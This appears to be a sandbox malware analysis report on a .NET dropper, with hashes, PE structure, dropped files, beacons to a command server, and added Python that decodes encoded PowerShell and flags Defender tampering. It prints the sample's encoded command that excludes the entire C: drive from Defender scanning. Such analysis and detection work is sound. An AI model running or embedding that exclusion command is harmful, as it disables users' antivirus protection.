                                                                    SHA-512:DF120F43FA17B2C37AD6D31E528495241146420CD017C18116BD074498CEF3834F408C50D289F8BDCE2955C464664A6C446800CB7B55C1461FB3CC0ACCC7FE10
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..b..............0......F........... ........@.. ....................................`.....................................O.... ...D........................................................................... ............... ..H............text........ ...................... ..`.rsrc....D... ...D..................@..@.reloc...............6..............@..B........................H.......................$$..............................................".(.....*".(.....*...0..g.........s......s........s....s........+..+.o....+.....+..o....+.,.+....o........+..o....+.,.+....,..o.......*..(......./..........:I..........RZ.......0.."........ .........%.....(......(.....+..*...0..L........s........o......s........o......o......!.,..o.......,..o.......,..o.......*.(.......)..........$4..........8?.......0..`.........(....(....o....(...+o.....+"..(.......o...
                                                                    Process:C:\Users\user\Desktop\kyFBQxVbsg.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):234
                                                                    Entropy (8bit):7.177722839093587
                                                                    Encrypted:false
                                                                    SSDEEP:6:6p288ILJoF861v83dMuVm6IRRqG6Q6P9SR2p6:6F8ILJoF8cv83uBRp6Qe9a2p6
                                                                    MD5:0BC4CF36ABF59CC54AA5D472D55FAE99
                                                                    SHA1:FE3A6EB4A46CA56C855CA308EC96838C96C63AA2
                                                                    SHA-256:9E6854C21A182D3224B40053CEE8BCF8C6E055C08D7ECE2ED6CDD6F7090C048E
                                                                    SHA-512:07028E2E89213CCB36A06968692D22F37452E22920C12B00C2B9503F22906388D1B1B07AAE92C43D675DD82C9BD2B019E53A298B23CEBEE26800B02855595FC6
                                                                    Malicious:false
                                                                    Preview:.j.V.J..!kU_..sY.[.t.....|]..%...*!.A].y..x......L.B......C.......=&f&..Vn.}...$.P....{j.gl.......Ni:.o.s./.=...fL...c..<.A..V1...4X>.".|.`....C..m7[u....$F')5..d..p;....2....MB.$..-..{o|{!uc..B.}...m....X8.0......7.@.....
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5978
                                                                    Entropy (8bit):5.485342256824624
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZ2TLZ+N3azqDo1ZVZVTLZ+N3azqDo1ZXvZprZkTLZ+N3azqDo1Z2wTTyZh:3acaJaq
                                                                    MD5:34326C020EA634E84A3536E82DAFA6F8
                                                                    SHA1:A2C2D2F602436AC220AE61B1F43ECBE10DFE8292
                                                                    SHA-256:4DB38969B245E4F1E94BFE1254F2A77D386F07717A5D61F7B964F4F3D091C8B0
                                                                    SHA-512:476601D408665AFBD80DFDE04925C9035E1FF99EAEBE0BBFD33AC61E67FA53977F87E0BEF0C3F7FA210B724D6FB12162690E3C89D2C83A04DCF4DC71B16CBA21
                                                                    Malicious:false
                                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220626094508..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==..Process ID: 6288..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220626094509..**********************..PS>Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'..**********************..Windows PowerShell transcript start..Start
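The transcript above records the command line the dropper hands to powershell.exe: a base64 blob behind -enc that, once decoded, sleeps ten seconds and then excludes the whole C: drive from Defender scanning. The Python below is an added decoder and triage check written for this page; it is not code from the Joe Sandbox report or from the sample. The only input it uses is the Host Application line copied from the transcript. The prefix handling for -EncodedCommand reflects how powershell.exe resolves abbreviated switches, and the list of Defender-tampering parameters it flags is this example's own choice, not something the report states.

```python
import base64
import binascii
import re

# Host Application line copied from the PowerShell transcript dropped in this
# report; only the Python quoting around it is added here.
TRANSCRIPT_HOST_APP = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc "
    "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAt"
    "AE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAA"
    "JwBDADoAXAAnAA=="
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, -EncodedCommand, ...), so capture "-e<letters>" and then check that the
# captured flag is a prefix of the full parameter name.  The payload must be
# base64 and is UTF-16LE once decoded.
_ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_commands(cmdline):
    """Return every script carried by an -EncodedCommand switch in cmdline."""
    scripts = []
    for flag, blob in _ENC_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ExecutionPolicy or -ep, which also start with 'e'
        try:
            raw = base64.b64decode(blob, validate=True)
            scripts.append(raw.decode("utf-16-le"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a well-formed -enc payload; leave it for manual review
    return scripts


# Defender-tampering cmdlets and parameters this example flags (assumed list).
_TAMPER_CMDLETS = ("set-mppreference", "add-mppreference")
_TAMPER_PARAMS = (
    "-exclusionpath", "-exclusionextension", "-exclusionprocess",
    "-disablerealtimemonitoring", "-disableioavprotection",
    "-disablebehaviormonitoring",
)
# An exclusion for a bare drive root such as 'C:\' turns scanning off for
# everything on that volume, so it gets its own verdict.
_DRIVE_ROOT = re.compile(r"-exclusionpath\s+['\"]?[a-z]:\\?['\"]?(?=\s|;|$)")


def triage_script(script):
    """Classify a decoded PowerShell script for Defender tampering."""
    low = script.lower()
    cmdlets = [c for c in _TAMPER_CMDLETS if c in low]
    params = [p for p in _TAMPER_PARAMS if p in low]
    return {
        "defender_tampering": bool(cmdlets and params),
        "cmdlets": cmdlets,
        "parameters": params,
        "whole_drive_exclusion": bool(_DRIVE_ROOT.search(low)),
    }


def triage_cmdline(cmdline):
    """Decode and triage every encoded script in a powershell.exe command line."""
    return [(script, triage_script(script)) for script in decode_encoded_commands(cmdline)]


if __name__ == "__main__":
    for script, verdict in triage_cmdline(TRANSCRIPT_HOST_APP):
        print(script)
        print(verdict)
```

Run against the transcript's command line this yields the same script the transcript shows after its PS> prompt, with both the tampering and the whole-drive verdicts set; the same two functions can be pointed at Sysmon event 1 or 4688 command lines to catch the pattern before the transcript exists.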
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.987468698438195
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:kyFBQxVbsg.exe
                                                                    File size:735232
                                                                    MD5:972334f0c55d0aeab0b32efe41ea3470
                                                                    SHA1:e9097b5cd1f976ecaf0accedf14f1d22bd72e6fa
                                                                    SHA256:eb91bf1e2eb3877f0942cef113bb0fb76e2c2fd2c2651dbf09f6da6df649e8fb
                                                                    SHA512:df120f43fa17b2c37ad6d31e528495241146420cd017c18116bd074498cef3834f408c50d289f8bdce2955c464664a6c446800cb7b55c1461fb3cc0accc7fe10
                                                                    SSDEEP:12288:9IxCLALqCddwA7Pljw5ej79G72AUBV3xaTPqfH0pLbwfBnC7aCNsuAIi6:9IxAgWA79Mq7s7ZUFV/IwfKagsWi6
                                                                    TLSH:67F423A18A0BDF5FE18F5ABB680452F7145CFE231240A318BA4173FE2EB354165E77A4
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..b..............0......F........... ........@.. ....................................`................................
                                                                    Icon Hash:e4d8d8d8dc483196
                                                                    Entrypoint:0x4b0ede
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x62B71A23 [Sat Jun 25 14:22:27 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(The bytes following the jmp are zero padding, which the disassembler renders as a run of add byte ptr [eax], al. 0x402000 is the single IAT slot, which holds mscoree.dll!_CorExeMain, so this is the standard managed entry stub and the native entrypoint contains nothing of interest; the real logic is in the CIL.)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb0e8c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb2000          0x4400        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb8000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xaeee4       0xaf000   False     0.9951590401785714  data       7.9984009418791      IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xb2000          0x4400        0x4400    False     0.5211971507352942  data       5.8634338520962395   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb8000          0xc           0x200     False     0.044921875         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                                                   Language  Country
RT_ICON        0xb2160  0x568   GLS_BINARY_LSB_FIRST
RT_ICON        0xb26d8  0x1e0b  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0xb44f4  0x8a8   dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON        0xb4dac  0xea8   data
RT_GROUP_ICON  0xb5c64  0x3e    data
RT_VERSION     0xb5cb4  0x362   data
RT_MANIFEST    0xb6028  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Jun 26, 2022 09:45:59.625091076 CEST  49798        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:45:59.667900085 CEST  6968         49798      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:00.312700987 CEST  49798        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:00.355405092 CEST  6968         49798      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:00.919429064 CEST  49798        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:00.964056969 CEST  6968         49798      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:03.523972988 CEST  49801        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:03.566504955 CEST  6968         49801      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:04.126405954 CEST  49801        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:04.168970108 CEST  6968         49801      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:04.811012983 CEST  49801        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:04.854006052 CEST  6968         49801      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:07.212428093 CEST  49803        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:07.255331993 CEST  6968         49803      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:07.837601900 CEST  49803        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:07.880376101 CEST  6968         49803      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:08.428515911 CEST  49803        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:08.471122980 CEST  6968         49803      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:10.571124077 CEST  49805        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:10.613929987 CEST  6968         49805      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:11.219929934 CEST  49805        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:11.262623072 CEST  6968         49805      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:11.811450958 CEST  49805        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:11.856297016 CEST  6968         49805      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:14.949017048 CEST  49809        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:14.993516922 CEST  6968         49809      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:15.610732079 CEST  49809        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:15.653306007 CEST  6968         49809      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:16.219952106 CEST  49809        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:16.262541056 CEST  6968         49809      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:18.189363003 CEST  49814        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:18.235021114 CEST  6968         49814      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:18.923306942 CEST  49814        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:18.967184067 CEST  6968         49814      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:19.610862970 CEST  49814        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:19.653702974 CEST  6968         49814      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:21.858103037 CEST  49830        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:21.900697947 CEST  6968         49830      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:22.532982111 CEST  49830        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:22.575666904 CEST  6968         49830      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:23.126782894 CEST  49830        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:23.169462919 CEST  6968         49830      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:24.980937004 CEST  49846        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:25.027003050 CEST  6968         49846      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:25.567730904 CEST  49846        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:25.610308886 CEST  6968         49846      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:26.127068043 CEST  49846        6968       192.168.2.6   194.5.98.107
Jun 26, 2022 09:46:26.172544956 CEST  6968         49846      194.5.98.107  192.168.2.6
Jun 26, 2022 09:46:27.845377922 CEST  49859        6968       192.168.2.6   194.5.98.107
                                                                    Jun 26, 2022 09:46:27.888818979 CEST696849859194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:28.424082041 CEST498596968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:28.468168974 CEST696849859194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:29.111676931 CEST498596968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:29.154382944 CEST696849859194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:31.270693064 CEST498646968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:31.317832947 CEST696849864194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:31.924412966 CEST498646968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:31.967787981 CEST696849864194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:32.612035990 CEST498646968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:32.657620907 CEST696849864194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:34.441975117 CEST498666968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:34.488702059 CEST696849866194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:35.127840042 CEST498666968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:35.170638084 CEST696849866194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:35.737322092 CEST498666968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:35.783057928 CEST696849866194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:37.239804983 CEST498676968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:37.285552025 CEST696849867194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:37.799927950 CEST498676968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:37.842793941 CEST696849867194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:38.346894026 CEST498676968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:38.391542912 CEST696849867194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:40.412826061 CEST498686968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:40.455522060 CEST696849868194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:40.956468105 CEST498686968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:41.001518011 CEST696849868194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:41.503704071 CEST498686968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:41.548046112 CEST696849868194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:43.088099957 CEST498706968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:43.130824089 CEST696849870194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:43.644164085 CEST498706968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:43.690030098 CEST696849870194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:44.191082954 CEST498706968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:44.235831976 CEST696849870194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:45.616626024 CEST498716968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:45.663141966 CEST696849871194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:46.175681114 CEST498716968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:46.222079992 CEST696849871194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:46.722542048 CEST498716968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:46.767266035 CEST696849871194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:48.412889957 CEST498736968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:48.456914902 CEST696849873194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:49.097759962 CEST498736968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:49.142527103 CEST696849873194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:49.691560984 CEST498736968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:49.735557079 CEST696849873194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:51.152981997 CEST498746968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:51.197582960 CEST696849874194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:51.895008087 CEST498746968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:51.940021992 CEST696849874194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:52.442003965 CEST498746968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:52.487611055 CEST696849874194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:53.821578026 CEST498856968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:53.865124941 CEST696849885194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:54.379611015 CEST498856968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:54.422627926 CEST696849885194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:54.926536083 CEST498856968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:54.969086885 CEST696849885194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:56.364463091 CEST498976968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:56.407010078 CEST696849897194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:56.911025047 CEST498976968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:56.953612089 CEST696849897194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:57.457989931 CEST498976968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:57.503067970 CEST696849897194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:58.873553038 CEST498996968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:58.918741941 CEST696849899194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:59.426927090 CEST498996968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:46:59.471564054 CEST696849899194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:46:59.973848104 CEST498996968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:00.016602993 CEST696849899194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:01.341916084 CEST499006968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:01.386122942 CEST696849900194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:01.895791054 CEST499006968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:01.938278913 CEST696849900194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:02.442711115 CEST499006968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:02.487206936 CEST696849900194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:04.134784937 CEST499016968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:04.179728985 CEST696849901194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:04.692811012 CEST499016968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:04.735352039 CEST696849901194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:05.239708900 CEST499016968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:05.282308102 CEST696849901194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:07.789252996 CEST499036968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:07.831809044 CEST696849903194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:08.334013939 CEST499036968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:08.376602888 CEST696849903194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:08.880717039 CEST499036968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:08.925160885 CEST696849903194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:10.603992939 CEST499046968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:10.646477938 CEST696849904194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:11.146603107 CEST499046968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:11.189647913 CEST696849904194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:11.693459034 CEST499046968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:11.738394022 CEST696849904194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:13.622252941 CEST499056968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:13.664674997 CEST696849905194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:14.178132057 CEST499056968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:14.222454071 CEST696849905194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:14.724921942 CEST499056968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:14.767492056 CEST696849905194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:16.468009949 CEST499066968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:16.512725115 CEST696849906194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:17.022079945 CEST499066968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:17.065099955 CEST696849906194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:17.568941116 CEST499066968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:17.611610889 CEST696849906194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:19.218106985 CEST499076968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:19.260552883 CEST696849907194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:19.772347927 CEST499076968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:19.814837933 CEST696849907194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:20.319293022 CEST499076968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:20.364103079 CEST696849907194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:21.718694925 CEST499086968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:21.761341095 CEST696849908194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:22.272612095 CEST499086968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:22.315393925 CEST696849908194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:22.819464922 CEST499086968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:22.862257004 CEST696849908194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:24.294898987 CEST499106968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:24.337321043 CEST696849910194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:24.850800991 CEST499106968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:24.893424988 CEST696849910194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:25.397783995 CEST499106968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:25.440849066 CEST696849910194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:26.765156031 CEST499116968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:26.808054924 CEST696849911194.5.98.107192.168.2.6
                                                                    Jun 26, 2022 09:47:27.319761992 CEST499116968192.168.2.6194.5.98.107
                                                                    Jun 26, 2022 09:47:27.362370014 CEST696849911194.5.98.107192.168.2.6
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Jun 26, 2022 09:45:59.455624104 CEST        62643         53  192.168.2.6    8.8.8.8
